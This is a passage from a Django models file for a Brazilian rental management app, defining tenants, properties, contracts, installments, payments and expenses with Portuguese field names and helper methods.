Imovei.objects.filter(do_locador=self.do_usuario).order_by('data_registro')\n return imoveis[list(slots).index(self)]\n except:\n return None\n\n def vencimento(self):\n # colocar para vencer um dia após, não zero(evitar reclamações dos usuários/não pode comer tempo deles)\n data = self.criado_em + relativedelta(days=int(self.tickets) * 30)\n return data.date()\n\n def dias_ativo(self):\n inicial = self.criado_em.date()\n final = self.vencimento()\n delta = final - inicial\n return int(delta.days)\n\n def dias_passados(self):\n inicial = self.criado_em.date()\n final = datetime.today().date()\n delta = final - inicial\n return int(delta.days)\n\n def dias_restando(self):\n dias_ativo = self.dias_ativo()\n dias_pasados = self.dias_passados()\n dias_restando = dias_ativo - dias_pasados\n return dias_restando if dias_restando >= 0 else 0\n\n def tickets_restando(self):\n \"\"\"Aqui deve retornar os tickets(self.tickets) menos a quantia de tickets equivalentes aos dias que já passaram\n esde a criação do slot até hoje\"\"\"\n tickets_passados = floor(self.dias_passados() / 30)\n tickets_restando = self.tickets - tickets_passados\n return tickets_restando if tickets_restando >= 0 else 0\n\n def ativado(self):\n if self.gratuito:\n return True\n else:\n return False if datetime.today().date() >= self.vencimento() else True\n\n def borda(self):\n if self.gratuito:\n return 'border-success'\n else:\n return 'border-secondary' if self.ativado() else 'border-warning'\n\n\nclass LocatariosManager(models.Manager):\n def nao_temporarios(self):\n # Locatarios cadastrados pelos usuários, não que se cadastraram pelo link(Portanto seus cadastros\n # estão no modo temporário(para aprovação))\n return self.exclude(temporario=True)\n\n\nclass Locatario(models.Model):\n do_locador = models.ForeignKey('Usuario', null=True, blank=True, on_delete=models.CASCADE)\n da_tarefa = models.OneToOneField('Tarefa', null=True, blank=True, on_delete=models.SET_NULL)\n\n nome = models.CharField(max_length=100, blank=False, verbose_name='Nome Completo')\n docs = ResizedImageField(size=[1280, None], upload_to='locatarios_docs/%Y/%m/', null=True, blank=True,\n verbose_name='Documentos', validators=[tratar_imagem, FileExtensionValidator])\n RG = models.CharField(max_length=9, null=False, blank=True, help_text='Digite apenas números',\n validators=[MinLengthValidator(7), MaxLengthValidator(9), apenas_numeros])\n CPF = models.CharField(max_length=11, null=False, blank=False, help_text='Digite apenas números',\n validators=[MinLengthValidator(11), MaxLengthValidator(11), apenas_numeros])\n ocupacao = models.CharField(max_length=85, verbose_name='Ocupação')\n endereco_completo = models.CharField(null=True, blank=True, max_length=150, verbose_name='Endereço Completo')\n telefone1 = models.CharField(max_length=11, blank=False, verbose_name='Telefone 1',\n help_text='Celular/Digite apenas números',\n validators=[MinLengthValidator(11), MaxLengthValidator(11), apenas_numeros])\n telefone2 = models.CharField(max_length=11, null=True, blank=True, verbose_name='Telefone 2',\n help_text='Celular/Digite apenas números',\n validators=[MinLengthValidator(11), MaxLengthValidator(11), apenas_numeros])\n email = models.EmailField(max_length=45, null=True, blank=True)\n nacionalidade = models.CharField(max_length=40, blank=False, default='Brasileiro(a)')\n estadocivil = models.IntegerField(blank=False, verbose_name='Estado Civil', choices=estados_civis)\n data_registro = models.DateTimeField(auto_now_add=True)\n temporario = models.BooleanField(null=True)\n objects = LocatariosManager()\n\n class Meta:\n constraints = [\n models.UniqueConstraint(fields=[\"CPF\", \"do_locador\"], name=\"cpf_locatario_por_usuario\"),\n ]\n verbose_name_plural = 'Locatários'\n\n def __str__(self):\n return f'{self.nome}'\n\n def com_contratos(self):\n contratos = Contrato.objects.ativos_hoje().filter(do_locador=self.do_locador, do_locatario=self)\n return contratos or None\n\n def com_imoveis(self):\n contratos = self.com_contratos()\n contratos_ativos = []\n for contrato in contratos:\n contratos_ativos.append(contrato)\n if contratos_ativos:\n imoveis_pk = [contrato.do_imovel.pk for contrato in contratos_ativos]\n imoveis = Imovei.objects.filter(pk__in=imoveis_pk)\n return imoveis\n else:\n return None\n\n def primeiro_ultimo_nome(self):\n return f'{self.nome.split()[:1][0]} {self.nome.split()[len(self.nome.split()) - 1:][0]}'\n\n def imoveis_alugados(self):\n x = Imovei.objects.filter(com_locatario=self.pk)\n return x\n\n def f_cpf(self):\n if self.CPF:\n return cpf_format(self.CPF)\n\n def f_tel1(self):\n if self.telefone1:\n return cel_format(self.telefone1)\n\n def f_tel2(self):\n if self.telefone2:\n return cel_format(self.telefone2)\n else:\n return None\n\n def contratos_qtd(self):\n return Contrato.objects.filter(do_locatario=self).count()\n\n\ntipos_de_imovel = (\n (0, 'Casa'),\n (1, 'Apartamento'),\n (2, 'Kitnet'),\n (3, 'Box/Loja'),\n (4, 'Escritório'),\n (5, 'Depósito/Armazém'),\n (6, 'Galpão'))\n\n\nclass ImovGrupo(models.Model):\n do_usuario = models.ForeignKey('Usuario', null=True, blank=True, on_delete=models.CASCADE)\n nome = models.CharField(max_length=35, blank=False, verbose_name='Criar Grupo')\n tipo = models.IntegerField(null=True, blank=True, choices=tipos_de_imovel, verbose_name='Tipo de Imóvel')\n imoveis = models.ManyToManyField('Imovei', blank=True)\n\n class Meta:\n verbose_name_plural = 'Grupos de imóveis'\n ordering = ('nome',)\n\n def __str__(self):\n return self.nome\n\n def arrecadacao_total(self):\n try:\n total = 0\n imoveis = Imovei.objects.filter(grupo=self)\n for imovel in imoveis:\n total += imovel.receita_acumulada()\n return valor_format(str(total))\n except:\n return None\n\n def arrecadacao_mensal(self):\n try:\n imoveis = Imovei.objects.filter(grupo=self)\n contratos_user = Contrato.objects.ativos_hoje().filter(do_imovel__in=imoveis, do_locador=self.do_usuario)\n arrecadacao_mensal = 0\n for contrato in contratos_user:\n arrecadacao_mensal += int(contrato.valor_mensal)\n return valor_format(str(arrecadacao_mensal))\n except:\n return None\n\n def valor_total_contratos_ativos(self):\n try:\n imoveis = Imovei.objects.filter(grupo=self)\n contratos_user = Contrato.objects.ativos_hoje().filter(do_imovel__in=imoveis, do_locador=self.do_usuario)\n valor_total_contratos_ativos = 0\n for contrato in contratos_user:\n valor_total_contratos_ativos += int(contrato.valor_do_contrato())\n return valor_format(str(valor_total_contratos_ativos))\n except:\n return None\n\n def valor_total_contratos(self):\n try:\n imoveis = Imovei.objects.filter(grupo=self)\n contratos_user = Contrato.objects.filter(do_imovel__in=imoveis, do_locador=self.do_usuario)\n valor_total_contratos = 0\n for contrato in contratos_user:\n valor_total_contratos += int(contrato.valor_do_contrato())\n return valor_format(str(valor_total_contratos))\n except:\n return None\n\n\nclass ImoveiManager(models.Manager):\n def ativos(self):\n imoveis_qs = self\n lista = []\n for imovel in imoveis_qs:\n if imovel.esta_ocupado() is True:\n lista.append(imovel.pk)\n imoveis_ativos = Imovei.objects.filter(pk__in=lista)\n return imoveis_ativos\n\n\nestados = (\n ('AC', 'Acre'), ('AL', 'Alagoas'), ('AP', 'Amapá'), ('AM', 'Amazonas'), ('BA', 'Bahia'), ('CE', 'Ceará'),\n ('DF', 'Distrito Federal'), ('ES', 'Espírito Santo'), ('GO', 'Goiás'), ('MA', 'Maranhão'), ('MT', 'Mato Grosso'),\n ('MS', 'Mato Grosso do Sul'), ('MG', 'Minas Gerais'), ('PA', 'Pará'), ('PB', 'Paraíba'), ('PR', 'Paraná'),\n ('PE', 'Pernambuco'), ('PI', 'Piauí'), ('RJ', 'Rio de Janeiro'), ('RN', 'Rio Grande do Norte'),\n ('RS', 'Rio Grande do Sul'), ('RO', 'Rondônia'), ('RR', 'Roraima'), ('SC', 'Santa Catarina'), ('SP', 'São Paulo'),\n ('SE', 'Sergipe'), ('TO', 'Tocantins')\n)\n\n\nclass Imovei(models.Model):\n do_locador = models.ForeignKey('Usuario', blank=False, on_delete=models.CASCADE)\n grupo = models.ForeignKey('ImovGrupo', blank=True, null=True, on_delete=models.SET_NULL)\n\n nome = models.CharField(max_length=25, blank=False, verbose_name='Rótulo')\n cep = models.CharField(max_length=8, blank=False, verbose_name='CEP',\n validators=[MinLengthValidator(8), MaxLengthValidator(8), apenas_numeros])\n endereco = models.CharField(max_length=150, blank=False, verbose_name='Endereço')\n numero = models.IntegerField(blank=False,\n validators=[MinValueValidator(1), MaxValueValidator(999999), apenas_numeros])\n complemento = models.CharField(max_length=80, null=True, blank=True)\n bairro = models.CharField(max_length=30, blank=False)\n cidade = models.CharField(max_length=30, blank=False)\n estado = models.CharField(max_length=2, blank=False, choices=estados)\n uc_energia = models.CharField(max_length=15, null=True, blank=True, verbose_name='Matrícula de Energia',\n validators=[MinLengthValidator(4), MaxLengthValidator(15)])\n uc_agua = models.CharField(max_length=15, null=True, blank=True, verbose_name='Matrícula de Saneamento',\n validators=[MinLengthValidator(4), MaxLengthValidator(15)])\n data_registro = models.DateTimeField(default=datetime.now)\n objects = ImoveiManager()\n\n class Meta:\n constraints = [\n models.UniqueConstraint(fields=[\"nome\", \"do_locador\"], name=\"nome_imovel_por_usuario\"),\n ]\n verbose_name_plural = 'Imóveis'\n ordering = ['-nome']\n\n def __str__(self):\n return f'{self.nome} ({self.grupo if self.grupo else \"Sem grupo\"})'\n\n def contrato_atual(self):\n contratos = Contrato.objects.ativos_hoje().filter(do_locador=self.do_locador, do_imovel=self)\n if contratos:\n return contratos[0]\n else:\n return None\n\n def contrato_todos(self):\n contratos = Contrato.objects.filter(do_locador=self.do_locador, do_imovel=self)\n if contratos:\n return contratos\n else:\n return None\n\n def com_locatario(self):\n if self.contrato_atual():\n return self.contrato_atual().do_locatario\n else:\n return None\n\n def nogrupo(self):\n return '' if self.grupo is None else self.grupo\n\n def esta_ocupado(self):\n return False if self.com_locatario is None else True\n\n def f_cep(self):\n return cep_format(self.cep)\n\n def endereco_base(self):\n complemento = f'({self.complemento})'\n return f'{self.endereco}, Nº{self.numero}{complemento if self.complemento else \"\"} - {self.bairro}'\n\n def endereco_completo(self):\n return f'{self.endereco_base()} - {self.cidade}/{self.estado}, {self.f_cep()}'\n\n def receita_acumulada(self):\n parcelas = Parcela.objects.filter(do_imovel=self, apagada=False)\n total = 0\n for parcela in parcelas:\n total += int(parcela.tt_pago)\n return total\n\n def receita_acumulada_format(self):\n return valor_format(str(self.receita_acumulada()))\n\n def em_slot(self):\n \"\"\" retorna true se estiver em slot e false se não \"\"\"\n slots = Slot.objects.filter(do_usuario=self.do_locador)\n imoveis_em_slot = []\n for slot in slots:\n if slot.ativado():\n imoveis_em_slot.append(slot.imovel())\n return True if self in imoveis_em_slot else False\n\n\nclass ContratoManager(models.Manager):\n def ativos_hoje(self):\n hoje = datetime.today().date()\n contratos_qs = self.filter(em_posse=True, rescindido=False, data_entrada__lte=hoje)\n lista = []\n for contrato in contratos_qs:\n if contrato.periodo_ativo_hoje():\n lista.append(contrato.pk)\n contratos_ativos = Contrato.objects.filter(pk__in=lista)\n return contratos_ativos\n\n def ativos_hoje_e_antes_de(self, data):\n contratos_qs = self.filter(em_posse=True, rescindido=False, data_entrada__lte=data)\n lista = []\n for contrato in contratos_qs:\n if contrato.periodo_ativo_hoje() or contrato.periodo_ativo_antes_de(data):\n lista.append(contrato.pk)\n contratos_ativos = Contrato.objects.filter(pk__in=lista)\n return contratos_ativos\n\n def ativos_margem(self):\n hoje = datetime.today().date()\n contratos_qs = self.filter(rescindido=False)\n lista = []\n for contrato in contratos_qs:\n if contrato.periodo_ativo_hoje() or contrato.periodo_ativo_futuramente() or \\\n contrato.periodo_ativo_xx_dias_atras():\n lista.append(contrato.pk)\n contratos_ativos = Contrato.objects.filter(pk__in=lista)\n return contratos_ativos\n\n def inativos(self):\n pass\n\n def ativos_e_no_slot(self):\n hoje = datetime.today().date()\n contratos_qs = self.filter(em_posse=True, rescindido=False, data_entrada__lte=hoje)\n lista = []\n for contrato in contratos_qs:\n if contrato.periodo_ativo_hoje() is True and contrato.do_imovel.em_slot() is True:\n lista.append(contrato.pk)\n contratos_ativos_slot = Contrato.objects.filter(pk__in=lista)\n return contratos_ativos_slot\n\n def ativos_e_sem_slot(self):\n hoje = datetime.today().date()\n contratos_qs = self.filter(em_posse=True, rescindido=False, data_entrada__lte=hoje)\n lista = []\n for contrato in contratos_qs:\n if contrato.periodo_ativo_hoje() is True and contrato.do_imovel.em_slot() is False:\n lista.append(contrato.pk)\n contratos_ativos_sem_slot = Contrato.objects.filter(pk__in=lista)\n return contratos_ativos_sem_slot\n\n\nclass Contrato(models.Model):\n do_locador = models.ForeignKey('Usuario', null=True, blank=True, on_delete=models.CASCADE)\n do_locatario = models.ForeignKey('Locatario', on_delete=models.CASCADE,\n verbose_name='Locatário')\n do_imovel = models.ForeignKey('Imovei', on_delete=models.CASCADE, verbose_name='No imóvel')\n da_tarefa = models.OneToOneField('Tarefa', null=True, blank=True, on_delete=models.SET_NULL)\n\n data_entrada = models.DateField(blank=False, verbose_name='Data de Entrada')\n duracao = models.IntegerField(null=False, blank=False, verbose_name='Duração do contrato(Meses)',\n validators=[MaxValueValidator(18), MinValueValidator(1)])\n valor_mensal = models.CharField(max_length=9, verbose_name='Valor Mensal (R$) ', blank=False,\n help_text='Digite apenas números',\n validators=[apenas_numeros, MinLengthValidator(3)])\n dia_vencimento = models.IntegerField(blank=False, validators=[MaxValueValidator(28), MinValueValidator(1)],\n verbose_name='Dia do vencimento', help_text='(1-28)')\n em_posse = models.BooleanField(default=False, null=False,\n help_text='Marque quando receber a sua via assinada e registrada em cartório')\n rescindido = models.BooleanField(default=False, null=False, help_text='Marque caso haja rescisão do contrato')\n codigo = models.CharField(null=False, editable=False, max_length=11, default=gerar_codigo_contrato)\n data_de_rescisao = models.DateField(blank=True, verbose_name='Data da rescisão', null=True)\n recibos_pdf = models.FileField(upload_to='recibos_docs/%Y/%m/', blank=True, verbose_name='Recibos')\n data_registro = models.DateTimeField(auto_now_add=True)\n objects = ContratoManager()\n\n class Meta:\n ordering = ['-data_entrada']\n\n def __str__(self):\n \"\"\"'O objeto count' diz em que posição este contrato fica na lista de contratos feitos com este locador neste\n imóvel\"\"\"\n contratos = Contrato.objects.filter(do_locador=self.do_locador, do_locatario=self.do_locatario,\n do_imovel=self.do_imovel)\n count = (f'{list(contratos).index(self) + 2}' if len(contratos) > 1 else '1')\n return (f'({self.do_locatario.primeiro_ultimo_nome()} em '\n f'{self.do_imovel.nome} - nº{count} - '\n f'{self.data_entrada.strftime(\"%m/%Y\")})')\n\n def nome_completo(self):\n return f'{self.do_locatario.nome} - {self.do_imovel} - {self.data_entrada.strftime(\"%d/%m/%Y\")} - ' \\\n f'({self.codigo})'\n\n def valor_format(self):\n return valor_format(self.valor_mensal)\n\n def valor_por_extenso(self):\n reais = self.valor_mensal[:-2]\n centavos = self.valor_mensal[-2:]\n centavos_format = f' e {num2words(int(centavos), lang=\"pt_BR\")} centavos'\n return f'{num2words(int(reais), lang=\"pt_BR\").capitalize()} reais{centavos_format if int(centavos) > 1 else \"\"}'\n\n def valor_do_contrato(self):\n return str(int(self.valor_mensal) * int(self.duracao))\n\n def valor_do_contrato_format(self):\n return valor_format(self.valor_do_contrato())\n\n def valor_do_contrato_por_extenso(self):\n valor = str(int(self.valor_mensal) * int(self.duracao))\n reais = valor[:-2]\n centavos = valor[-2:]\n centavos_format = f' e {num2words(int(centavos), lang=\"pt_BR\")} centavos'\n return f'{num2words(int(reais), lang=\"pt_BR\").capitalize()} reais{centavos_format if int(centavos) > 1 else \"\"}'\n\n def total_quitado(self):\n valores = Pagamento.objects.filter(ao_contrato=self).values_list('valor_pago')\n valor_tt = 0\n for valor in valores:\n valor_tt += int(valor[0])\n return valor_tt\n\n def total_pg_format(self):\n if self.total_quitado() is None:\n return 'R$0,00'\n else:\n return valor_format(str(self.total_quitado()))\n\n def falta_pg(self):\n if self.total_quitado() is None:\n return self.valor_do_contrato()\n else:\n return str((int(self.valor_mensal) * int(self.duracao)) - self.total_quitado())\n\n def falta_pg_format(self):\n return valor_format(self.falta_pg())\n\n def em_maos(self):\n return 'Sim' if self.em_posse else 'Não'\n\n def data_saida(self):\n data = self.data_entrada + relativedelta(months=self.duracao)\n return data\n\n def periodo_vencido(self):\n return True if self.data_saida() > datetime.today() else False\n\n def periodo_ativo_hoje(self):\n hoje = datetime.today().date()\n return True if self.data_entrada <= hoje <= self.data_saida() else False\n\n def periodo_ativo_antes_de(self, data):\n return True if self.data_entrada <= data <= self.data_saida() else False\n\n def periodo_ativo_futuramente(self):\n return True if self.data_entrada > datetime.today().date() else False\n\n def periodo_ativo_xx_dias_atras(self, dias=45):\n return True if self.data_saida() >= datetime.today().date() + timedelta(days=-dias) else False\n\n def pagamento_total(self):\n pagamentos = Pagamento.objects.filter(ao_contrato=self.pk).values('valor_pago')\n valor_tt = 0\n for valor in pagamentos:\n valor_tt += int(valor['valor_pago'])\n return valor_tt\n\n def duracao_dias(self):\n delta = self.data_saida() - self.data_entrada\n return delta.days\n\n def transcorrido_dias(self):\n delta = datetime.today().date() - self.data_entrada\n return delta.days\n\n def faltando_dias(self):\n return self.duracao_dias() - self.transcorrido_dias()\n\n def passou_do_limite(self):\n return True if int(self.faltando_dias()) <= 30 else False\n\n def recibos_entregues_qtd(self):\n x = Parcela.objects.filter(do_contrato=self, recibo_entregue=True).count()\n return x\n\n def parcelas_pagas_qtd(self):\n numero = self.pagamento_total() / int(self.valor_mensal)\n return int(floor(numero))\n\n def quitado(self):\n return True if self.total_quitado() == int(self.valor_do_contrato()) else False\n\n def title_pagou_parcelas(self):\n if self.parcelas_pagas_qtd() > 0:\n plural = 's' if self.parcelas_pagas_qtd() > 1 else ''\n return f'Quitou {self.parcelas_pagas_qtd()} parcela{plural} de {self.duracao}'\n else:\n return 'Nenhuma parcela quitada ainda'\n\n def faltando_recibos_qtd(self):\n try:\n return self.parcelas_pagas_qtd() - self.recibos_entregues_qtd()\n except:\n return None\n\n def duracao_meses_por_extenso(self):\n return num2words(self.duracao, lang='pt_BR')\n\n def dia_vencimento_por_extenso(self):\n return num2words(self.dia_vencimento, lang='pt_BR')\n\n def vencimento_atual(self):\n parcela_n_kit = Parcela.objects.filter(do_contrato=self, apagada=False).order_by('data_pagm_ref')\n parcelas = []\n for parcela in parcela_n_kit:\n if int(parcela.tt_pago) < int(self.valor_mensal) or int(parcela.tt_pago) == 0:\n parcelas.append(parcela)\n return parcelas[0].data_pagm_ref if parcelas else None\n\n def vencimento_atual_textual(self):\n txt = '📃✔ï¸�'\n title = 'O contrato está quitado'\n if self.vencimento_atual() is not None:\n hoje = datetime.today().date()\n vencim_atual = self.vencimento_atual()\n delta = hoje - vencim_atual\n delta2 = vencim_atual - hoje\n if vencim_atual == hoje + relativedelta(days=-1):\n txt = f'â­• Venceu ontem ({vencim_atual.strftime(\"%d/%m/%Y\")})'\n title = ''\n elif vencim_atual < hoje + relativedelta(days=-1):\n txt = f'â­• Venceu em {vencim_atual.strftime(\"%d/%m/%Y\")} ({delta.days} dias atrás)'\n title = ''\n elif vencim_atual == hoje:\n txt = f'🟡 Vence hoje ({vencim_atual.strftime(\"%d/%m/%Y\")})'\n title = ''\n elif vencim_atual == hoje + relativedelta(days=+1):\n txt = f'🟡 Vencerá amanhã ({vencim_atual.strftime(\"%d/%m/%Y\")})'\n title = ''\n elif vencim_atual > hoje + relativedelta(days=+1):\n if delta2.days <= 5:\n txt = f'🟡 Vencerá em {vencim_atual.strftime(\"%d/%m/%Y\")} (em {delta2.days} dias)'\n else:\n txt = f'Vencerá em {vencim_atual.strftime(\"%d/%m/%Y\")} (em {delta2.days} dias)'\n title = ''\n return txt, title\n\n def divida_atual_meses(self):\n parcelas = Parcela.objects.filter(do_contrato=self, apagada=False, data_pagm_ref__lte=datetime.today().date())\n parcelas_vencidas_n_quitadas = 0\n for parcela in parcelas:\n if int(parcela.tt_pago) < int(self.valor_mensal):\n parcelas_vencidas_n_quitadas += 1\n return parcelas_vencidas_n_quitadas\n\n def divida_atual_valor(self):\n parcelas = Parcela.objects.filter(do_contrato=self, apagada=False, data_pagm_ref__lte=datetime.today().date())\n parcelas_vencidas_n_quitadas = []\n for parcela in parcelas:\n if int(parcela.tt_pago) < int(self.valor_mensal) and parcela.apagada is False:\n parcelas_vencidas_n_quitadas.append(int(parcela.tt_pago))\n soma_tt_pg = sum([i for i in parcelas_vencidas_n_quitadas])\n valor = (len(parcelas_vencidas_n_quitadas) * int(self.valor_mensal)) - (int(soma_tt_pg) if soma_tt_pg else 0)\n return valor, valor_format(str(valor))\n\n\nclass ContratoModelo(models.Model):\n titulo = models.CharField(blank=False, max_length=120, verbose_name='', help_text='Titulo', unique=True)\n autor = models.ForeignKey('Usuario', blank=False, null=True, related_name='contratomod_autor_set',\n on_delete=models.SET_NULL)\n usuarios = models.ManyToManyField('Usuario', related_name='contratos_modelos', blank=True,\n through='UsuarioContratoModelo')\n excluidos = models.ManyToManyField('Usuario', related_name='contratos_modelos_excluidos', blank=True)\n\n descricao = models.CharField(blank=True, max_length=480, verbose_name='', help_text='Descrição')\n corpo = RichTextField(null=True, blank=True, verbose_name='', validators=[tamanho_max_mb])\n data_criacao = models.DateTimeField(auto_now_add=True)\n variaveis = models.JSONField(null=True, blank=True)\n condicoes = models.JSONField(null=True, blank=True)\n comunidade = models.BooleanField(default=False, verbose_name='Comunidade')\n visualizar = models.FileField(null=True)\n\n class Meta:\n verbose_name_plural = 'Modelos de contratos'\n\n def __str__(self):\n return f'{self.titulo}'\n\n def display_variaveis(self):\n variaveis = []\n for variavel in list(self.variaveis):\n if variavel in modelo_variaveis:\n variaveis.append([modelo_variaveis[variavel][0], modelo_variaveis[variavel][1]])\n return variaveis if len(variaveis) > 0 else False\n\n def display_condicoes(self):\n condicoes = []\n for condicao in list(self.condicoes):\n if condicao in modelo_condicoes:\n condicoes.append([modelo_condicoes[condicao][0], modelo_condicoes[condicao][1]])\n return condicoes if len(condicoes) > 0 else False\n\n def verificar_utilizacao_config(self):\n \"\"\"Este método visa verificar se existe algum 'ContratoDocConfig' utilizando esta instancia de modelo\"\"\"\n configs_do_user = ContratoDocConfig.objects.filter(do_modelo=self).count()\n return True if configs_do_user > 0 else False\n\n def verificar_utilizacao_usuarios(self, usuario_pk):\n \"\"\"Este método visa verificar se existe algum 'usuário' além do usuário verificador com uma cópia desta\n instancia de modelo\"\"\"\n outros_usuarios = self.usuarios.all().exclude(pk=usuario_pk).count()\n return True if outros_usuarios > 0 else False\n\n def delete(self, *args, **kwargs):\n \"\"\"Apagar o contrato apenas se não houver nenhum ContratoDocConfig ou outro usuário utilizando-o, caso contrário\n # apagar o contrato apenas para o usuário, retirar da comunidade caso ele seja o autor.\"\"\"\n try:\n user = Usuario.objects.get(pk=kwargs['kwargs'].get('user_pk'))\n um = self.verificar_utilizacao_config()\n dois = self.verificar_utilizacao_usuarios(user.pk)\n if um or dois:\n self.usuarios.remove(user)\n if self.autor == user:\n self.comunidade = False\n self.excluidos.add(user)\n self.save(update_fields=['comunidade', ])\n if um and not dois:\n self.titulo = f'{self.titulo}///só_config///{parcela_uuid()}'\n self.save(update_fields=['titulo', ])\n\n else:\n super(ContratoModelo, self).delete()\n except:\n super(ContratoModelo, self).delete()\n\n\ntipos_de_locacao = (\n (None, '-----------'),\n (1, 'residencial'),\n (2, 'não residencial'))\n\n\nclass UsuarioContratoModelo(models.Model):\n usuario = models.ForeignKey('Usuario', on_delete=models.CASCADE, related_name='usuario_contrato_modelo')\n contrato_modelo = models.ForeignKey('ContratoModelo', on_delete=models.CASCADE,\n related_name='usuario_contrato_modelo')\n data_criacao = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return f'{self.contrato_modelo} - {self.usuario} - {self.data_criacao}'\n\n class Meta:\n verbose_name_plural = 'Modelos de contratos-Usuários'\n\n\nclass ContratoDocConfig(models.Model):\n do_contrato = models.ForeignKey('Contrato', null=True, blank=False, on_delete=models.CASCADE)\n do_modelo = models.ForeignKey('ContratoModelo', null=True, blank=False, on_delete=models.SET_NULL,\n verbose_name='Modelo de contrato')\n\n tipo_de_locacao = models.IntegerField(null=True, blank=True, choices=tipos_de_locacao,\n verbose_name='Tipo de Locação')\n caucao = models.IntegerField(null=True, blank=True,\n validators=[MinValueValidator(0), MaxValueValidator(3), apenas_numeros])\n\n fiador_nome = models.CharField(max_length=100, null=True, blank=True, verbose_name='Nome Completo')\n fiador_RG = models.CharField(max_length=9, null=True, blank=True, help_text='Digite apenas números',\n validators=[MinLengthValidator(7), MaxLengthValidator(9), apenas_numeros],\n verbose_name='RG')\n fiador_CPF = models.CharField(max_length=11, null=True, blank=True, help_text='Digite apenas números',\n validators=[MinLengthValidator(11), MaxLengthValidator(11), apenas_numeros],\n verbose_name='CPF')\n fiador_ocupacao = models.CharField(max_length=85, null=True, blank=True, verbose_name='Ocupação')\n fiador_endereco_completo = models.CharField(null=True, blank=True, max_length=150, verbose_name='Endereço Completo')\n fiador_nacionalidade = models.CharField(max_length=40, null=True, blank=True, verbose_name='Nacionalidade')\n fiador_estadocivil = models.IntegerField(null=True, blank=True, verbose_name='Estado Civil', choices=estados_civis)\n\n class Meta:\n verbose_name_plural = 'Configs de contratos'\n\n def __str__(self):\n return f'{self.do_contrato} ({self.do_modelo})'\n\n def f_cpf(self):\n return cpf_format(self.fiador_CPF)\n\n\nclass Parcela(models.Model):\n do_usuario = models.ForeignKey('Usuario', blank=False, on_delete=models.CASCADE)\n do_contrato = models.ForeignKey('Contrato', null=False, blank=False, on_delete=models.CASCADE)\n do_imovel = models.ForeignKey('Imovei', null=False, blank=False, on_delete=models.CASCADE)\n do_locatario = models.ForeignKey('Locatario', null=False, blank=False, on_delete=models.CASCADE)\n da_tarefa = models.OneToOneField('Tarefa', null=True, on_delete=models.SET_NULL)\n codigo = models.CharField(blank=False, null=False, editable=False, max_length=7, unique_for_month=True,\n default=parcela_uuid)\n data_pagm_ref = models.DateField(null=False, blank=False,\n help_text='Data referente ao vencimento do pagamento desta parcela')\n tt_pago = models.CharField(max_length=9, blank=False, default=0)\n recibo_entregue = models.BooleanField(default=False)\n apagada = models.BooleanField(default=False)\n\n def __str__(self):\n return (f'Parcela do contr.: {str(self.do_contrato.codigo)}/{self.do_locatario.primeiro_ultimo_nome()}/'\n f'{self.do_imovel}({self.data_pagm_ref.strftime(\"%B/%Y\")})')\n\n def tt_pago_format(self):\n return valor_format(self.tt_pago)\n\n def falta_pagar_format(self):\n contrato = Contrato.objects.get(pk=self.do_contrato.pk)\n return valor_format(str(int(contrato.valor_mensal) - int(self.tt_pago)))\n\n def esta_pago(self):\n contrato = Contrato.objects.get(pk=self.do_contrato.pk)\n return True if int(self.tt_pago) == int(contrato.valor_mensal) else False\n\n def esta_vencido(self):\n return True if datetime.today().date() > self.data_pagm_ref else False\n\n def posicao(self):\n try:\n parcelas = list(\n Parcela.objects.filter(do_contrato=self.do_contrato, apagada=False).values_list('pk', flat=True))\n parcela = self.pk\n return parcelas.index(parcela) + 1\n except:\n return None\n\n def definir_apagada(self):\n self.apagada = True\n self.save(update_fields=['apagada'])\n\n def restaurar(self):\n self.apagada = False\n self.save(update_fields=['apagada'])\n\n def de_contrato_ativo(self):\n if (self.do_contrato.periodo_ativo_hoje() and self.do_contrato.em_posse is True and self.do_contrato.rescindido\n is False):\n return True\n else:\n return False\n\n\nlista_pagamentos = (\n (0, 'PIX'),\n (1, 'Din. Espécie'),\n (2, 'Boleto Banc.'),\n (3, 'Tranfer. Banc.'))\n\n\nclass Pagamento(models.Model):\n ao_locador = models.ForeignKey('Usuario', on_delete=models.CASCADE)\n ao_contrato = models.ForeignKey('Contrato', on_delete=models.CASCADE,\n verbose_name='Do Contrato')\n do_locatario = models.ForeignKey('Locatario', on_delete=models.CASCADE)\n\n valor_pago = models.CharField(max_length=9, verbose_name='Valor Pago (R$) ', blank=False,\n validators=[apenas_numeros])\n data_pagamento = models.DateTimeField(blank=False, verbose_name='Data do Pagamento')\n data_de_recibo = models.DateTimeField(blank=True, verbose_name='Data em que foi marcado recibo entregue', null=True)\n forma = models.IntegerField(blank=False, choices=lista_pagamentos, verbose_name='Forma de Pagamento')\n data_criacao = models.DateTimeField(auto_now_add=True)\n\n def valor_format(self):\n return valor_format(self.valor_pago)\n\n def __str__(self):\n return f'{self.do_locatario} - R${self.valor_format()} - {self.data_pagamento.strftime(\"%D\")}'\n\n\nclass Gasto(models.Model):\n do_locador = models.ForeignKey('Usuario', null=False, on_delete=models.CASCADE)\n do_imovel = models.ForeignKey('Imovei', blank=True, null=True, on_delete=models.CASCADE,\n help_text='Deixe em branco para registrar um gasto avulso')\n\n valor = models.CharField(max_length=9, verbose_name='Valor Gasto (R$) ', blank=False, validators=[apenas_numeros])\n data = models.DateTimeField(blank=False)\n observacoes = models.TextField(max_length=500, blank=True, verbose_name='Observações')\n comprovante = ResizedImageField(size=[1280, None], upload_to='gastos_comprovantes/%Y/%m/', blank=True,\n verbose_name='Comporvante', validators=[tratar_imagem, FileExtensionValidator])\n data_criacao = models.DateTimeField(auto_now_add=True)\n\n def get_alsolute_url(self):\n return reverse('home:Gastos', args=[(str(self.pk)), ])\n\n def valor_format(self):\n return valor_format(self.valor)\n\n def __str__(self):\n return f'{self.observacoes[:20]} - {self.valor_format()} - {self.data.strftime(\"%D\")}'\n\n\nclass Anotacoe(models.Model):\n do_usuario = models.ForeignKey('Usuario', null=False, on_delete=models.CASCADE)\n da_tarefa = models.OneToOneField('Tarefa', null=True, blank=True, on_delete=models.SET_NULL)\n\n titulo = models.CharField(blank=False, max_length=100, verbose_name='Título')\n data_registro = models.DateTimeField(blank=True)\n texto = models.TextField(blank=True, null=True)\n tarefa = models.BooleanField(default=False,\n help_text='Marque para adicionar este registro na sua lista de tarefas.')\n feito = models.BooleanField(default=False)\n\n class Meta:\n verbose_name_plural = 'Anotações'\n\n def tipo(self):\n if self.tarefa:\n if self.feito:\n return 'Tarefa concluída'\n else:\n return 'Tarefa pendente'\n else:\n return 'Anotação'\n\n def __str__(self):\n return f'{self.titulo} - {self.data_registro.strftime(\"%d/%m/%Y\")}'\n\n def texto_pequeno(self):\n tamanho = 50\n if 